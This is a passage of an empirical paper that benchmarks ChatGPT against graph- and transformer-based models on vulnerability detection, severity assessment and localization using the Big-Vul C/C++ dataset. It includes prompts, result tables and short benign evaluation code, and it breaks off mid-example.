Software Vulnerabilities (SVs) can expose software systems to risk situations and consequently place the software under cyber-attacks, eventually causing huge economic losses and even threatening people's lives. Therefore, vulnerability databases have been created to document and analyze publicly known security vulnerabilities. For example, Common Vulnerabilities and Exposures (CVE) [5, 38] and SecurityFocus [52] are two well-known vulnerability databases. Besides, the Common Weakness Enumeration (CWE) defines the common software weaknesses of individual vulnerabilities, which are often referred to as vulnerability types of CVEs. To better address these vulnerabilities, researchers have proposed many approaches for understanding the effects of software vulnerabilities, including SV detection [7, 8, 11, 18, 27, 34, 35, 42, 55, 57, 59], SV assessment [17, 29, 30, 39, 50], SV localization [32, 33, 40], SV repair [10, 41, 58, 60] as well as SV description [24–26, 51]. Many novel technologies are adopted to promote the progress of software vulnerability management, including software analysis [14, 31], machine learning [27, 59], and deep learning [32, 39], especially large language models [24, 25, 56].

3 EXPERIMENTAL DESIGN

In this section, we present our research questions (RQs), our studied dataset, the baseline approaches, and the evaluation metrics.

3.1 Studied Dataset

We adopt the widely used dataset (named Big-Vul) provided by Fan et al. [15] for the following reasons. The most important one is to satisfy the distinct characteristics of the real world as well as the diversity in the dataset, which is suggested by previous works [8, 27]. Big-Vul, to the best of our knowledge, is the largest-scale vulnerability dataset with diverse information about the vulnerabilities, which are collected from practical projects, and these vulnerabilities are recorded in the Common Vulnerabilities and Exposures (CVE)¹. The second one is to compare fairly with existing state-of-the-art (SOTA) approaches (e.g., LineVul, Devign). The third one is that Big-Vul is the only vulnerability dataset that contains the fixed version of vulnerable functions, which can be utilized to evaluate whether ChatGPT has the ability to fix a vulnerable function.

Big-Vul contains 3,754 code vulnerabilities in total, collected from 348 open-source projects spanning 91 different vulnerability types from 2002 to 2019. It has 188,636 C/C++ functions with a vulnerable ratio of 5.7% (i.e., 10,900 vulnerable functions). The authors linked the code changes with CVEs and their descriptive information to enable a deeper analysis of the vulnerabilities.

The original dataset cannot be directly used in our study. Therefore, we filter the original dataset from two aspects. Firstly, considering the input length limitation (i.e., 4,096 tokens) of the ChatGPT API, we use the tiktoken tool², a fast BPE tokenizer for use with OpenAI's models, to filter out functions that exceed 2,000 tokens and leave the remaining 2,096 tokens for the input prompt as well as the output of the fixed version of a vulnerable function generated by ChatGPT. Secondly, we filter out the instances whose CWE ID is recorded as NaN.

Finally, to better evaluate ChatGPT's ability, and considering the large cost of interaction with ChatGPT, we need to determine the number of instances (i.e., functions in Big-Vul) needed to obtain results (i.e., a testing dataset) that reflect the target dataset (i.e., Big-Vul) as precisely as needed. We sample the testing instances for each CWE in Big-Vul with 95% confidence and 5% interval³. Eventually, we obtain 724 vulnerable functions and 12,701 non-vulnerable functions to conduct our study. The statistics are shown in Table 2.

Table 2. The statistics of the studied dataset

Dataset            #Vulnerabilities   #Non-Vulnerabilities   Ratio
Original Big-Vul   10,900             177,736                1:16.3
Filtered Big-Vul   8,048              142,302                1:17.9
Sampled Big-Vul    724                12,701                 1:17.5
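The token-length filter can be sketched in a few lines with tiktoken. The field and variable names below are illustrative, not from the paper's reproduction package, and the toy samples stand in for records loaded from the Big-Vul CSV:

import tiktoken

# Keep functions that fit in 2,000 tokens so that ~2,096 tokens of the
# 4,096-token context remain for the prompt and ChatGPT's output, and
# drop instances whose CWE ID is recorded as NaN.
enc = tiktoken.encoding_for_model("gpt-3.5-turbo")

def keep_sample(sample, max_tokens=2000):
    if sample.get("cwe_id") in (None, "", "NaN"):
        return False
    return len(enc.encode(sample["func_code"])) <= max_tokens

# Toy stand-ins for Big-Vul records (illustrative only):
big_vul_samples = [
    {"func_code": "int add(int a, int b) { return a + b; }", "cwe_id": "CWE-190"},
    {"func_code": "void f() {}", "cwe_id": "NaN"},
]
filtered = [s for s in big_vul_samples if keep_sample(s)]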
¹ https://cve.mitre.org/
² https://github.com/openai/tiktoken
³ https://surveysystem.com/sscalc.htm

3.2 Evaluation Metrics

For the considered software vulnerability-related tasks, we perform evaluations using widely adopted performance metrics. For the software vulnerability detection task, metrics such as Precision, Recall, F1-score, and Accuracy are used [40]. For software vulnerability assessment, Accuracy is adopted. For the software vulnerability location task, we adopt three performance metrics: Hit@Accuracy, Precision, and Recall. For the software vulnerability repair task, we use Hit@Accuracy. For the software vulnerability description generation task, we use the Rouge-1, Rouge-2, and Rouge-L metrics.
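For completeness, the detection metrics can be computed directly from binary labels. This is a standard computation, shown here as a self-contained sketch with our own function name:

# Sketch of the detection metrics in Sec. 3.2; y_true and y_pred are 0/1
# sequences (1 = vulnerable). Names are ours, not from the paper.
def detection_metrics(y_true, y_pred):
    tp = sum(t == 1 and p == 1 for t, p in zip(y_true, y_pred))
    fp = sum(t == 0 and p == 1 for t, p in zip(y_true, y_pred))
    fn = sum(t == 1 and p == 0 for t, p in zip(y_true, y_pred))
    tn = sum(t == 0 and p == 0 for t, p in zip(y_true, y_pred))
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f1 = (2 * precision * recall / (precision + recall)
          if precision + recall else 0.0)
    accuracy = (tp + tn) / len(y_true)
    return precision, recall, f1, accuracy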
3.3 Baselines

To comprehensively compare the performance of ChatGPT with existing state-of-the-art (SOTA) approaches, in this study we consider four approaches: Devign [59], ReVeal [8], IVDetect [32], and LineVul [18]. We briefly introduce them as follows.

Devign, proposed by Zhou et al. [59], is a general graph neural network-based model for graph-level classification through learning on a rich set of code semantic representations, including the AST, CFG, DFG, and code sequences. It uses a novel Conv module to efficiently extract useful features from the learned rich node representations for graph-level classification.

ReVeal, proposed by Chakraborty et al. [8], contains two main phases. In the feature extraction phase, it translates code into a graph embedding, and in the training phase, it trains a representation learner on the extracted features to obtain a model that can distinguish vulnerable functions from non-vulnerable ones.

IVDetect, proposed by Li et al. [32], contains a coarse-grained vulnerability detection component and a fine-grained interpretation component. In particular, IVDetect represents source code in the form of a program dependence graph (PDG) and treats the vulnerability detection problem as graph-based classification via a graph convolutional network with feature attention. As for interpretation, IVDetect adopts a GNNExplainer to provide fine-grained interpretations that include the sub-graph in the PDG with the crucial statements that are relevant to the detected vulnerability.

LineVul, proposed by Fu et al. [18], is a Transformer-based line-level vulnerability prediction approach. LineVul leverages the BERT architecture with self-attention layers that can capture long-term dependencies within a long sequence. Besides, benefiting from the large-scale pre-trained model, LineVul can intrinsically capture more lexical and logical semantics for the given code input. Moreover, LineVul adopts the attention mechanism of the BERT architecture to locate the vulnerable lines for finer-grained detection.

3.4 Implementation

We implemented the experiments in Python by wrapping the state-of-the-art ChatGPT [43] model through its API support [9] and adhering to the best-practice guide [49] for each prompt. We utilize the gpt-3.5-turbo-0301 model from the ChatGPT family, which is the version used uniformly for our experiments. We also instruct ChatGPT to output the results in JSON format to facilitate the automatic organization of the data. Regarding ReVeal, IVDetect, and LineVul, we utilize their publicly available source code and perform fine-tuning with the default parameters provided in their original code. Considering that Devign's code is not publicly available, we make every effort to replicate its functionality and achieve similar results on the original paper's dataset. All these models are implemented using the PyTorch [45] framework. The evaluation is conducted on a 16-core workstation equipped with an Intel(R) Xeon(R) Gold 6226R CPU @ 2.90 GHz and 192 GB RAM, running Ubuntu 20.04.1 LTS.

4 EXPERIMENTAL RESULTS

This section presents the experimental results of ChatGPT by evaluating ChatGPT's performance on the widely used comprehensive dataset (i.e., Big-Vul [15]) covering five SV-related tasks.

Table 3. The comparison between ChatGPT and four approaches on software vulnerability detection

Setting   Approach   #Testing   F1-score   Precision   Recall   Accuracy
Sampled   ChatGPT    13,425     0.106      0.091       0.127    0.884
Sampled   LineVul    13,425     0.260      0.340       0.210    0.935
Sampled   Devign     9,115      0.162      0.094       0.571    0.674
Sampled   ReVeal     9,115      0.176      0.108       0.487    0.749
Sampled   IVDetect   9,195      0.181      0.110       0.498    0.741
GPT&EB    ChatGPT    13,425     0.106      0.091       0.127    0.884
GPT&EB    LineVul    13,425     0.260      0.340       0.210    0.935
GPT&EB    ChatGPT    9,115      0.109      0.091       0.135    0.878
GPT&EB    Devign     9,115      0.162      0.094       0.571    0.674
GPT&EB    ChatGPT    9,115      0.109      0.091       0.135    0.878
GPT&EB    ReVeal     9,115      0.176      0.108       0.487    0.749
GPT&EB    ChatGPT    9,195      0.113      0.095       0.138    0.875
GPT&EB    IVDetect   9,195      0.181      0.110       0.498    0.741
GPT&AB    ChatGPT    9,025      0.108      0.090       0.133    0.877
GPT&AB    LineVul    9,025      0.240      0.350       0.180    0.940
GPT&AB    Devign     9,025      0.163      0.095       0.572    0.673
GPT&AB    ReVeal     9,025      0.176      0.108       0.488    0.746
GPT&AB    IVDetect   9,025      0.175      0.107       0.484    0.745

"GPT&EB" refers to ChatGPT ∩ Each Baseline. "GPT&AB" refers to ChatGPT ∩ All Baselines.
4.1 RQ-1: Evaluating Vulnerability Detection of ChatGPT

In this RQ, we first investigate the vulnerability detection ability of ChatGPT and make a comparison with the existing state-of-the-art (SOTA) approaches. Then, we investigate whether the decision results of ChatGPT can be induced by human instructions.

RQ-1.1: How does ChatGPT perform on vulnerability detection compared to the state-of-the-art approaches?

Experimental Setting. We sample each CWE from the Big-Vul dataset as introduced in Section 3.1 and adopt the four widely used performance measures (i.e., Precision, Recall, F1-score, and Accuracy) for evaluating the performance of ChatGPT on detecting vulnerabilities. Notice that we use the following instruction for this SV detection task.

Prompt 1.1: I want you to act as a vulnerability scanner. I will provide you a C code snippet and want you to tell whether it has a vulnerability. You need to output "yes" or "no" first (output no if uncertain), and then explain.
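A query of this kind can be issued, for example, through the legacy OpenAI Python client contemporary with gpt-3.5-turbo-0301. The wrapper below is a hedged sketch of how Prompt 1.1 might be combined with the JSON-output instruction from Sec. 3.4; the field layout is ours, and the paper's actual reproduction package may differ:

import json
import openai  # legacy 0.x client, contemporary with gpt-3.5-turbo-0301

PROMPT = (
    "I want you to act as a vulnerability scanner. I will provide you a C code "
    "snippet and want you to tell whether it has a vulnerability. You need to "
    'output "yes" or "no" first (output no if uncertain), and then explain. '
    'Respond in JSON with the fields "answer" and "explanation".'
)

def detect_vulnerability(code_snippet):
    response = openai.ChatCompletion.create(
        model="gpt-3.5-turbo-0301",
        messages=[{"role": "user", "content": PROMPT + "\n\n" + code_snippet}],
        temperature=0,
    )
    content = response["choices"][0]["message"]["content"]
    return json.loads(content)  # assumes the model honored the JSON instruction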
Moreover, to better understand the performance difference between ChatGPT and SOTA software vulnerability detection approaches, we consider four approaches in total, which can be divided into two groups: transformer-based (LineVul) and graph-based (Devign, ReVeal, IVDetect). Besides, graph-based approaches need to obtain the structure information (e.g., the control flow graph (CFG) and data flow graph (DFG)) of the studied functions, so we adopt the same toolkit, Joern [1], to transform the sampled functions. The functions are dropped directly if they cannot be transformed by Joern successfully. Finally, we fine-tune the four SOTAs on the remaining dataset of Big-Vul after sampling the instances for testing. That is, we refer to Big-Vul as D and the sampled dataset from D is referred to as S; therefore, the difference between D and S is used to fine-tune the four approaches.

Besides, considering the difference in the testing size of each approach, we show three types of settings when comparing ChatGPT and the baselines: (1) Sampled means evaluating each approach on the sampled functions that can be successfully analyzed; (2) Intersection between ChatGPT and each baseline (ChatGPT ∩ Each Baseline) means evaluating the performance difference between ChatGPT and each baseline on the intersection of the two approaches' testing datasets; (3) Intersection among ChatGPT and all baselines (ChatGPT ∩ All Baselines) means evaluating the performance difference among ChatGPT and all baselines on the intersection of all approaches' testing datasets.

Apart from presenting the overall performance comparison, we also give the detailed performance of ChatGPT on the Top-10 CWE types in the testing dataset for a better analysis, as shown in Table 4.

Table 4. The software vulnerability detection performance comparison between ChatGPT and the four baselines (metric values listed in the order ChatGPT/LineVul/Devign/ReVeal/IVDetect)

CWE Type   #Sampled   #Vul   F1-score                       Precision
CWE-125    305        16     0.06/0.23/0.17/0.19/0.29       0.05/0.30/0.10/0.11/0.18
CWE-476    302        13     0.19/0.10/0.10/0.14/0.08       0.17/0.14/0.06/0.08/0.05
CWE-189    248        11     0.06/0.21/0.11/0.18/0.25       0.04/0.25/0.06/0.11/0.15
CWE-200    231        10     0.00/0.13/0.17/0.14/0.18       0.00/0.20/0.10/0.09/0.11
CWE-119    221        9      0.08/0.43/0.15/0.18/0.25       0.07/0.60/0.08/0.10/0.15
CWE-264    216        9      0.16/0.00/0.03/0.11/0.10       0.12/0.00/0.02/0.06/0.06
CWE-362    212        10     0.21/0.00/0.13/0.27/0.27       0.17/0.00/0.08/0.17/0.17
CWE-20     172        7      0.00/0.31/0.10/0.18/0.12       0.00/0.33/0.06/0.12/0.07
CWE-399    168        11     0.00/0.14/0.19/0.13/0.14       0.00/0.33/0.12/0.09/0.09
CWE-416    162        10     0.00/0.00/0.18/0.15/0.17       0.00/0.00/0.12/0.10/0.12

CWE Type   Recall                         Accuracy
CWE-125    0.06/0.19/0.56/0.69/0.88       0.89/0.93/0.70/0.69/0.78
CWE-476    0.23/0.08/0.38/0.54/0.23       0.92/0.94/0.70/0.72/0.78
CWE-189    0.09/0.18/0.45/0.55/0.73       0.87/0.94/0.67/0.78/0.80
CWE-200    0.00/0.10/0.70/0.40/0.50       0.88/0.94/0.70/0.79/0.81
CWE-119    0.11/0.33/0.67/0.67/0.78       0.90/0.96/0.68/0.75/0.81
CWE-264    0.22/0.00/0.11/0.33/0.33       0.90/0.94/0.74/0.77/0.76
CWE-362    0.30/0.00/0.40/0.70/0.70       0.90/0.94/0.75/0.82/0.82
CWE-20     0.00/0.29/0.43/0.43/0.43       0.90/0.95/0.70/0.84/0.73
CWE-399    0.00/0.09/0.45/0.27/0.27       0.88/0.93/0.74/0.76/0.77
CWE-416    0.00/0.00/0.40/0.30/0.30       0.86/0.93/0.78/0.79/0.82

Results. Table 3 shows the overall performance measures of ChatGPT and the four approaches, with the best performances highlighted in bold. The second column lists the testing size for each approach after the pre-processing operation on the functions. Notice that, since both ChatGPT and LineVul have no requirement on a given function, they have the largest testing size. As shown in Table 3, we can make the following observations: 1) ChatGPT has poor performance compared with the existing approaches when considering Precision, Recall, and F1-score.
Results. Table 3 shows the overall performance measures of ChatGPT and the four approaches, with the best performances highlighted in bold. The second column lists the testing size for each approach after the pre-processing operations on the functions. Notice that, since both ChatGPT and LineVul place no structural requirements on a given function, they have the largest testing sizes. As shown in Table 3, we can make the following observations: 1) ChatGPT has poor performance compared with existing approaches when considering Precision, Recall, and F1-score. 2) As for Accuracy, LineVul (transformer-based) obtains the best performance and ChatGPT ranks second, better than the three graph-based models. 3) As for Precision, we find that ChatGPT performs similarly to the three graph-based models. 4) As for Recall, ChatGPT performs the worst with only 13.2% on average; meanwhile, LineVul also achieves a poor performance of 19.5% on average, which is far less than the graph-based models.

Finding-1. ChatGPT has the ability to detect software vulnerabilities. However, the existing state-of-the-art approaches perform better overall.

Table 4 shows the detailed comparisons on the Top-10 CWE types between ChatGPT and the four SOTAs. In this table, we highlight the best performance for each metric in bold, and to better distinguish the performance difference between ChatGPT and the SOTAs, we fill the cells with different colors (i.e., ChatGPT or SOTA). According to the results, we can make the following observations: 1) In most cases, the SOTAs obtain better performance than ChatGPT on all CWE types across all performance metrics. 2) Considering both F1-score and Precision, ChatGPT achieves its best performances on CWE-476 (0.19) and CWE-264 (0.16), which indicates that ChatGPT is good at checking "NULL Pointer Dereference" and "Permissions, Privileges, and Access Controls" vulnerabilities.
3) ChatGPT performs worst on several CWE types (CWE-200, CWE-20, CWE-399, and CWE-416), which means ChatGPT has almost no ability to detect whether a vulnerable function can expose sensitive information to unauthorized actors (CWE-200), whether the input is improperly validated (CWE-20), or whether resources are managed correctly (CWE-399 and CWE-416).

Finding-2. ChatGPT is good at checking both "NULL Pointer Dereference" (CWE-476) and "Permissions, Privileges, and Access Controls" (CWE-264) vulnerabilities, but it performs badly on authorization checking, resource management, and input validation related vulnerabilities (i.e., CWE-200, CWE-20, CWE-399, and CWE-416).

RQ-1.2: How does ChatGPT perform on vulnerability detection when induced by instruction?

Experimental Setting. We also conduct an experiment on whether we can confuse ChatGPT when it detects software vulnerabilities. That is, given a vulnerable function, we first ask ChatGPT for its decision. If ChatGPT makes a correct classification, we then give it another prompt with the contrary conclusion (e.g., that the code is non-vulnerable) and record its response. For the non-vulnerable functions, we apply the same procedure with the opposite inducing prompt. We also record the response when ChatGPT gives a wrong classification at the first judgment. For a better understanding, we present the workflow of inducing ChatGPT in Fig. 2.

For the two types of settings, we calculate the following statistics:
A. The number of judgments that are correctly classified by ChatGPT for each CWE (i.e., #Correct).
B. The number of judgments in which ChatGPT remains confident in its classification even though we explicitly instruct it with the opposite categorization (i.e., #Keep). Note that ChatGPT may first apologize and request more information before providing a specific type for a given vulnerability, which is still considered confident.
C. The number of judgments in which ChatGPT shows a lack of confidence after receiving an opposite instruction (i.e., #Change).

[Fig. 2. Workflow of estimation on inducing ChatGPT's judgment. For a vulnerable (resp. non-vulnerable) input function, ChatGPT is first asked "Is this code vulnerable?"; if the first answer is correct, an inducing prompt with the opposite conclusion ("This code has no vulnerability" / "This code has a vulnerability") is issued and the response is recorded.]
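The two-round dialogue of Fig. 2 can be sketched as follows. This is an illustration only: `ask_chatgpt` is a hypothetical helper (not part of the paper's artifact) that sends a message list to the chat API and returns the reply text.

```python
# Sketch of the inducing workflow in Fig. 2. `ask_chatgpt(history)` is a
# hypothetical helper that sends the message list to the chat API and
# returns the reply text.
def induce(code: str, is_vulnerable: bool, ask_chatgpt) -> dict:
    history = [{"role": "user",
                "content": f"Is this code vulnerable?\n{code}"}]
    first = ask_chatgpt(history)
    first_correct = first.lower().startswith("yes") == is_vulnerable
    result = {"first_correct": first_correct, "second_response": None}
    if first_correct:
        # Push back with the opposite conclusion and record the reaction.
        opposite = ("This code has no vulnerability" if is_vulnerable
                    else "This code has a vulnerability")
        history += [{"role": "assistant", "content": first},
                    {"role": "user", "content": opposite}]
        # Whether the model keeps its decision (#Keep) or flips (#Change)
        # is judged from this second response; the paper classifies the
        # reaction manually, so no automatic rule is encoded here.
        result["second_response"] = ask_chatgpt(history)
    return result
```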
Table 5. The induced results of ChatGPT on both vulnerable and clean functions

Setting: Vul.
- CWE types: CWE-119, CWE-125, CWE-129, CWE-134, CWE-18, CWE-19, CWE-190, CWE-191, CWE-200, CWE-22, CWE-254, CWE-264, CWE-269, CWE-284, CWE-295, CWE-310, CWE-311, CWE-320, CWE-327, CWE-347, CWE-352, CWE-354, CWE-358, CWE-369, CWE-400, CWE-404, CWE-415, CWE-416, CWE-476, CWE-494, CWE-59, CWE-682, CWE-704, CWE-74, CWE-754, CWE-755, CWE-77, CWE-78, CWE-787, CWE-79, CWE-834 | #Size: 1–31 | #Correct: 1–6 | #Keep: 0 | #Change: 1–6 | %Keep: 0 | %Change: 100%
- CWE-399 | #Size: 15 | #Correct: 1 | #Keep: 1 | #Change: 0 | %Keep: 100.0% | %Change: 0.0%

Setting: Non-Vul.
- CWE types: CWE-522, CWE-295, CWE-706, CWE-664, CWE-769, CWE-704, CWE-494, CWE-835, CWE-74, CWE-772, CWE-682, CWE-404, CWE-19, CWE-415, CWE-320, CWE-134, CWE-264, CWE-284, CWE-369, CWE-617, CWE-290, CWE-119, CWE-330, CWE-93, CWE-200, CWE-388, CWE-20, CWE-189, CWE-59, CWE-352, CWE-281, CWE-190, CWE-120, CWE-269, CWE-611, CWE-254, CWE-22, CWE-416, CWE-502, CWE-754, CWE-400, CWE-426, CWE-476, CWE-287, CWE-787, CWE-310, CWE-674, CWE-834, CWE-399, CWE-79, CWE-732, CWE-311, CWE-16, CWE-94, CWE-358, CWE-601, CWE-89, CWE-665, CWE-362, CWE-285, CWE-129, CWE-862, CWE-17, CWE-909, CWE-78, CWE-77, CWE-918, CWE-436, CWE-125, CWE-354, CWE-346, CWE-1021, CWE-361, CWE-693, CWE-172, CWE-90, CWE-770, CWE-255, CWE-191, CWE-532, CWE-18, CWE-347, CWE-755, CWE-668 | #Size: 3–363 | #Correct: 3–343 | #Keep: 2–264 | #Change: 1–95 | %Keep: 60%–95.7% | %Change: 4.3%–40%
- CWE-327 | #Size: 2 | #Correct: 2 | #Keep: 2 | #Change: 0 | %Keep: 100.0% | %Change: 0.0%
- CWE-824 | #Size: 6 | #Correct: 6 | #Keep: 6 | #Change: 0 | %Keep: 100.0% | %Change: 0.0%
- CWE-763 | #Size: 7 | #Correct: 7 | #Keep: 7 | #Change: 0 | %Keep: 100.0% | %Change: 0.0%

Results. Table 5 shows the detailed results of ChatGPT on vulnerable and non-vulnerable functions, respectively, when we induce it to change its decisions. In the table, "#Size" represents the sampled size for each CWE type, and "#Correct" means the number of functions that are correctly classified when ChatGPT gives its first decision. We also list some statistics of the induced results.
"#Keep" and "#Change" represent whether ChatGPT keeps its original decision or changes to the opposite decision, respectively. Notice that we only present the results where ChatGPT first makes a correct decision and ignore the others (i.e., functions incorrectly classified the first time).

According to the results, we can make the following observations:
• ChatGPT can easily be induced to change its decision if we instruct it with an opposite prompt.
• As for vulnerable functions, almost all decisions are changed by ChatGPT for all CWE types with a ratio of 100% (except for CWE-399), which means ChatGPT loses confidence in its decision.
• As for non-vulnerable functions, we reach a similar conclusion: ChatGPT changes its decision after we induce it for almost all CWEs, with a ratio of 4.3%–40.0% (except for CWE-327, CWE-824, and CWE-763), which also indicates ChatGPT's loss of confidence in its decision.

Finding-3. ChatGPT can easily be induced to change its decision, especially when classifying vulnerable functions, which indicates that ChatGPT lacks confidence in its own vulnerability detection ability.

4.2 RQ-2: Evaluating Vulnerability Assessment of ChatGPT

Experimental Setting. We instruct ChatGPT with the following prompts (i.e., Prompt 2.1 and Prompt 2.2), telling it to act as a vulnerability assessor. We first provide ChatGPT with only the vulnerable code to explore its performance (Prompt 2.1). After that, we provide it with some key important information, including the CVE description, the project, the commit message, as well as the file name where the vulnerable code exists, to investigate the performance differences (Prompt 2.2).

Prompt 2.1: I will provide you a vulnerable C code snippet and you just need to output qualitative severity ratings of "Low", "Medium", and "High" for CVSS v2.0 in the format Severity: "Low" or "Medium" or "High" without any explanation.

Prompt 2.2: Now I will provide you with additional information about this C code snippet. Please re-output the qualitative severity ratings of "Low", "Medium", and "High" for CVSS v2.0 in the format Severity: "Low", "Medium" or "High" without any explanation.

Table 6. A vulnerable code for ChatGPT to assess with different prompts

Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability (CWE-119) in linux
Prompt 1: (Prompt 2.1, as above)
Input 1: An example of a C code snippet with vulnerabilities (CVE-2011-2517).
Response 1: Severity: Medium
Prompt 2: (Prompt 2.2, as above)
Input 2: Project: Linux. File Name: net/wireless/nl80211.c. CVE Description: Multiple buffer overflows in net/wireless/nl80211.c in the Linux kernel before 2.6.39.2 allow local users to gain privileges by leveraging the CAP_NET_ADMIN capability during scan operations with a long SSID value. Commit Message: nl80211: fix check for valid SSID size in scan operations. In both trigger_scan and sched_scan operations, we were checking for the SSID length before assigning the value correctly. Since the memory was just kzalloc'ed, the check was always failing and SSIDs with over 32 characters were allowed to go through. This was causing a buffer overflow when copying the actual SSID to the proper place. This bug has been there since 2.6.29-rc4.
Response 2: Severity: High
Analysis: The true Severity is High. After providing the additional key information, ChatGPT's output for the Severity changed from Medium to High.
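For reference, the qualitative ratings requested in Prompts 2.1 and 2.2 correspond to fixed CVSS v2.0 base-score ranges under NVD's convention (0.0–3.9 Low, 4.0–6.9 Medium, 7.0–10.0 High). The paper does not spell this mapping out, so the helper below is an assumption about how ground-truth labels could be derived from CVSS scores.

```python
# Hedged helper: map a CVSS v2.0 base score to the qualitative rating used
# in Prompts 2.1/2.2 (NVD's standard v2 ranges; assumed, not stated in the
# paper).
def cvss_v2_rating(base_score: float) -> str:
    if not 0.0 <= base_score <= 10.0:
        raise ValueError("CVSS v2 base scores lie in [0.0, 10.0]")
    if base_score < 4.0:
        return "Low"
    if base_score < 7.0:
        return "Medium"
    return "High"
```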
Table 7. The software vulnerability assessment performance of ChatGPT on Top-10 CWE types

CWE Type | #Size | Accuracy | Accuracy_key
CWE-119 | 18 | 0.06 | 0.61
CWE-125 | 22 | 0.41 | 0.27
CWE-189 | 19 | 0.26 | 0.58
CWE-20 | 14 | 0.21 | 0.50
CWE-200 | 18 | 0.56 | 0.39
CWE-264 | 13 | 0.31 | 0.38
CWE-362 | 20 | 0.35 | 0.55
CWE-399 | 14 | 0.21 | 0.43
CWE-416 | 16 | 0.19 | 0.38
CWE-476 | 16 | 0.31 | 0.44
Average | 170 | 0.29 | 0.45

Results. Table 7 shows the detailed results of ChatGPT on vulnerability assessment. "#Size" means the number of detected vulnerable functions. "Accuracy" refers to the probability of ChatGPT correctly predicting qualitative severity ratings, while "Accuracy_key" refers to the probability of ChatGPT correctly predicting qualitative severity ratings when provided with the key important information. Notice that we manually filter out the results where ChatGPT identifies the function as not containing any vulnerability.
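The two accuracies in Table 7 can be computed from paired predictions as sketched below; the record layout is a hypothetical illustration, not the paper's code.

```python
# Sketch of the two assessment accuracies in Table 7: `pred` comes from
# Prompt 2.1 (code only) and `pred_key` from Prompt 2.2 (code plus key
# information). The (truth, pred, pred_key) layout is hypothetical.
def assessment_accuracy(rows):
    """rows: iterable of (true_rating, pred, pred_key) triples."""
    n = acc = acc_key = 0
    for truth, pred, pred_key in rows:
        n += 1
        acc += (pred == truth)
        acc_key += (pred_key == truth)
    return acc / n, acc_key / n
```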
As shown in Table 7, we can make the following observations: 1) On average, ChatGPT has an accuracy of 0.29 for predicting qualitative severity ratings when provided with only the vulnerable code snippet (Prompt 2.1). When given additional key important information (Prompt 2.2), the accuracy increases to 0.45. This demonstrates that providing more context improves ChatGPT's vulnerability assessment capabilities. 2) The performance of ChatGPT varies across different CWE types. 2.1) Positive improvement. For some CWE types (e.g., CWE-119, CWE-189, CWE-20, CWE-399, and CWE-426), the accuracy improves significantly when given additional information. For example, on CWE-119, ChatGPT obtains only 6% accuracy when given the code snippet alone, but this increases to 61% with more information, a roughly tenfold improvement. 2.2) Negative decrease. For some CWE types such as CWE-125 and CWE-200, the accuracy decreases (from 0.41 to 0.27 and from 0.56 to 0.39, respectively) when provided with the key important information. This suggests that ChatGPT's performance is affected by the specific type of vulnerability being assessed.

Finding-4. ChatGPT has limited capacity for assessing vulnerability severity based on source code only, but it can be greatly improved when provided with more context information in most cases.

To analyze why ChatGPT works well for some CWE types and not for others, it is important to understand the nature of these CWE types and the additional information provided as key important information:

Case 1: Complexity of CWE types. Some CWE types might be more complex or challenging to identify than others. For example, CWE-416 (Use After Free) might be difficult to recognize due to intricate memory management and pointer manipulation, which could explain the lower accuracy. On the other hand, CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer) might be easier to identify due to more apparent patterns in the code, leading to a significant improvement in accuracy when given additional information.

Case 2: Quality of key important information. The accuracy of ChatGPT's predictions is also affected by the relevance and quality of the additional key important information provided. In cases where the additional information is relevant and specific, ChatGPT's performance might improve significantly. However, if the provided information is vague or less pertinent to the vulnerability type, it might not be helpful or could even degrade the performance, as seen in CWE-125 and CWE-200.

Case 3: Bias in training data. ChatGPT's training data may contain more examples of certain vulnerability types, leading to better performance in identifying those types. If the training data lacks sufficient examples of a specific CWE type, ChatGPT might struggle to recognize the vulnerabilities and accurately predict the severity ratings for that CWE type.

Case 4: Limitations in understanding code. ChatGPT, while powerful, might have limitations in understanding the intricacies and nuances of programming languages, memory management, and other aspects of code execution. As a result, it might have difficulty identifying vulnerabilities that require a deeper understanding of these concepts, such as CWE-416 (Use After Free) and CWE-399 (Resource Management Errors).

Finding-5. Despite improvements in accuracy with more context, ChatGPT still has limitations in accurately predicting severity ratings for some CWE types. This indicates that there is room for further enhancement of ChatGPT's vulnerability assessment capabilities to achieve consistent performance across all vulnerability types.

Finding-6. ChatGPT's accuracy in predicting qualitative severity ratings for vulnerabilities increases from 0.29 to 0.45 when given key important information. However, the improvement varies across different CWE types, suggesting that ChatGPT's performance is affected by the specific vulnerability being assessed.

4.3 RQ-3: Evaluating Vulnerability Localization of ChatGPT

Setting. We select the vulnerable functions with information on vulnerable lines from each CWE type for the evaluation and instruct ChatGPT with the following prompt to explore its vulnerability localization performance.
Prompt 3.1: I will provide you with a C code snippet and you must locate vulnerable lines. First, you need to use the index to label each line of code, and then point out which lines of code are vulnerable, like Vulnerable lines: [1,4,5].

A specific vulnerable function may contain one or several vulnerable lines of code (Lines_ground), and ChatGPT may also predict one or several potential ones (Lines_predict). We compare Lines_predict to Lines_ground to check whether each line index L_i ∈ Lines_predict belongs to Lines_ground; we treat L_i as predicted correctly if it does, and incorrectly otherwise. We also use Lines_both to represent the intersection of Lines_predict and Lines_ground.

To better evaluate the vulnerability localization performance of ChatGPT on a specific vulnerable function, we give the following definitions:
• Hit@Acc measures the effectiveness of ChatGPT and equals 1 if ChatGPT correctly predicts at least one vulnerable line; otherwise, it equals 0.
• Precision indicates how many of ChatGPT's predicted vulnerability locations are actual vulnerability locations. It is defined as Precision = #Lines_both / #Lines_predict.
• Recall indicates how many actual vulnerability locations ChatGPT correctly finds. It is defined as Recall = #Lines_both / #Lines_ground.

For example, suppose a given vulnerable function has six vulnerable lines "[2,3,5,9,14,23]", and ChatGPT gives a prediction with 10 potential lines "[1,3,5,11,15,16,17,21,22,23]". Then Lines_ground equals "[2,3,5,9,14,23]", Lines_predict equals "[1,3,5,11,15,16,17,21,22,23]", and Lines_both equals "[3,5,23]". According to these values, we obtain Precision = 3/10, Recall = 3/6, and Hit@Acc = 1.
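The worked example above can be checked with a few lines of set arithmetic; the function below is a direct transcription of the three definitions, not the authors' code.

```python
# Direct transcription of the Hit@Acc / Precision / Recall definitions for
# vulnerability localization.
def localization_metrics(lines_predict, lines_ground):
    both = set(lines_predict) & set(lines_ground)  # Lines_both
    precision = len(both) / len(lines_predict) if lines_predict else 0.0
    recall = len(both) / len(lines_ground) if lines_ground else 0.0
    hit_at_acc = 1 if both else 0
    return hit_at_acc, precision, recall

# The example from the text: Precision = 3/10, Recall = 3/6, Hit@Acc = 1.
assert localization_metrics(
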